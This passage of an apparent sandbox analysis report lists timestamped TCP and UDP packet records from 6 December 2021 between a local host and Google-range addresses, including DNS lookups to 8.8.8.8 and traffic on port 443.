                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.220860958 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.221280098 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.221349955 CET44349715142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.221370935 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.221400023 CET49715443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.224826097 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.224922895 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.232472897 CET49717443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.232512951 CET44349717142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.245441914 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.248393059 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.248486042 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.248542070 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.248577118 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.248593092 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.248636007 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.248656034 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.249306917 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.249362946 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.249383926 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.249413013 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.249469042 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.250576973 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.251910925 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.251965046 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.251993895 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.252019882 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.252070904 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.253248930 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.267082930 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.267152071 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.267266035 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.267309904 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.267627954 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.267705917 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.267723083 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.268268108 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.268937111 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.270205975 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.270282030 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.270353079 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.270371914 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.271576881 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.271655083 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.271668911 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.271723032 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.272836924 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.274194956 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.274293900 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.274368048 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.274386883 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.275544882 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.275624990 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.275650024 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.276310921 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.276835918 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.277998924 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.278059959 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.278079033 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.278119087 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.278224945 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.279238939 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.280476093 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.280539036 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.280544996 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.280563116 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.280615091 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.281657934 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.282772064 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.282876015 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.282952070 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.282969952 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.283066034 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.285888910 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.286410093 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.286472082 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.286478996 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.286494970 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.286549091 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.287650108 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.288784027 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.288870096 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.288877964 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.288892984 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.288964033 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.289896965 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.290970087 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.291029930 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.291094065 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.291104078 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.292049885 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.292114973 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.292124987 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.293059111 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.293217897 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.293229103 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.293276072 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.293946981 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.294934034 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.294994116 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.295001984 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.295016050 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.295495987 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.295984030 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.296930075 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.297009945 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.297032118 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.297049999 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.297118902 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.297890902 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.298886061 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.298949957 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.299021006 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.299034119 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.299829960 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.299895048 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.299905062 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.300653934 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.300721884 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.300731897 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.300776958 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.301486015 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.302249908 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.302309036 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.302313089 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.302335978 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.302386045 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.302989960 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.303791046 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.303848028 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.303906918 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.303917885 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.303966999 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.304543018 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.305294991 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.305350065 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.305370092 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.305382013 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.305433989 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.306024075 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.306765079 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.306862116 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.306924105 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.306937933 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.306993008 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.307341099 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.307441950 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.307501078 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.307559013 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.307569981 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.308264017 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.308279991 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.308379889 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.308438063 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.308439016 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.308458090 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.308511972 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.309154987 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.309248924 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.309319019 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.309382915 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.309393883 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.309442043 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.310142040 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.310235023 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.310305119 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.310364008 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.310375929 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.310631990 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.310992956 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.311476946 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.311542034 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.311602116 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.311602116 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.311623096 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.311671972 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.311682940 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.312007904 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.312405109 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.312494993 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.312567949 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.312570095 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.312587976 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.312680006 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.313342094 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.313438892 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.313496113 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.313498974 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.313513994 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.313570023 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.314178944 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.314313889 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.314372063 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.314431906 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.314443111 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.314687967 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.315085888 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.315287113 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.315355062 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.348359108 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.350960016 CET49718443192.168.2.3142.250.181.228
                                                                                                                                                                                                                        Dec 6, 2021 19:08:52.350991964 CET44349718142.250.181.228192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.438443899 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.438513041 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.438623905 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.438900948 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.438931942 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.503242970 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.503616095 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.503675938 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.504024029 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.504106045 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.505064964 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.505198956 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.507069111 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.507165909 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.507260084 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.533441067 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.533485889 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.533607960 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.533649921 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.533732891 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.534234047 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.535691977 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.535738945 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.535804987 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.535844088 CET44349725142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.535906076 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.535952091 CET49725443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.535981894 CET49725443192.168.2.3142.250.186.65

                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.669466019 CET5415453192.168.2.38.8.8.8
                                                                                                                                                                                                                        Dec 6, 2021 19:08:32.689768076 CET53541548.8.8.8192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.583690882 CET5280653192.168.2.38.8.8.8
                                                                                                                                                                                                                        Dec 6, 2021 19:08:33.603542089 CET53528068.8.8.8192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.778985023 CET6078453192.168.2.38.8.8.8
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.790374041 CET5114353192.168.2.38.8.8.8
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.794327021 CET5902653192.168.2.38.8.8.8
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.814053059 CET53590268.8.8.8192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.819608927 CET53607848.8.8.8192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:51.831160069 CET53511438.8.8.8192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:54.998714924 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.025309086 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.025722027 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.052037954 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.052093983 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.052134991 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.052175999 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.052503109 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.053920984 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.114059925 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.114741087 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.147510052 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.148175955 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.158168077 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.158215046 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.158246040 CET44356238142.250.186.78192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.158778906 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:55.184945107 CET56238443192.168.2.3142.250.186.78
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.408777952 CET4955953192.168.2.38.8.8.8
                                                                                                                                                                                                                        Dec 6, 2021 19:08:56.437242031 CET53495598.8.8.8192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.453399897 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.479840994 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.480319023 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.506896973 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.506922960 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.506938934 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.506956100 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.507272959 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.508385897 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.537612915 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.537869930 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.571171999 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.571777105 CET53617443192.168.2.3142.250.186.65
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.572951078 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.572978973 CET44353617142.250.186.65192.168.2.3
                                                                                                                                                                                                                        Dec 6, 2021 19:08:58.573005915 CET44353617142.250.186.65192.168.2.3
